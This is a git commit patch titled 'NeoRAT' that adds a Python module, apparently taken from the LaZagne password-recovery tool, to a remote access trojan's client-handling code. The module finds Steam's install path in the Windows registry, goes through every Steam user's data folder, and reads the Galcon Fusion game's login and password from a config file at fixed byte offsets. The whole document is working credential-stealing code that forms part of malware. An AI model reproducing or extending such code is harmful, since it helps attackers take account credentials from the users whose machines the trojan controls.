From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/games/galconfusion.py        | 55 ++++++++++++++++++++++
 1 file changed, 55 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/games/galconfusion.py

(limited to 'foreign/client_handling/lazagne/softwares/games/galconfusion.py')

diff --git a/foreign/client_handling/lazagne/softwares/games/galconfusion.py b/foreign/client_handling/lazagne/softwares/games/galconfusion.py
new file mode 100644
index 0000000..b4279c5
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/games/galconfusion.py
@@ -0,0 +1,55 @@
+# -*- coding: utf-8 -*-
+
+import os
+
+try: 
+    import _winreg as winreg
+except ImportError:
+    import winreg
+
+import foreign.client_handling.lazagne.config.winstructure as win
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import string_to_unicode
+
+
+class GalconFusion(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'galconfusion', 'games', registry_used=True)
+
+    def run(self):
+        creds = []
+        results = None
+
+        # Find the location of steam - to make it easier we're going to use a try block
+        # 'cos I'm lazy
+        try:
+            with win.OpenKey(win.HKEY_CURRENT_USER, 'Software\\Valve\\Steam') as key:
+                results = winreg.QueryValueEx(key, 'SteamPath')
+        except Exception:
+            pass
+
+        if results:
+            steampath = string_to_unicode(results[0])
+            userdata = os.path.join(steampath, u'userdata')
+
+            # Check that we have a userdata directory
+            if not os.path.exists(userdata):
+                self.error(u'Steam doesn\'t have a userdata directory.')
+                return
+
+            # Now look for Galcon Fusion in every user
+            for f in os.listdir(userdata):
+                filepath = os.path.join(userdata, string_to_unicode(f), u'44200\\remote\\galcon.cfg')
+                if not os.path.exists(filepath):
+                    continue
+
+                # If we're here we should have a Galcon Fusion file
+                with open(filepath, mode='rb') as cfgfile:
+                    # We've found a config file, now extract the creds
+                    data = cfgfile.read()
+                    creds.append({
+                        'Login': data[4:0x23],
+                        'Password': data[0x24:0x43]
+                    })
+
+            return creds
-- 
cgit v1.2.3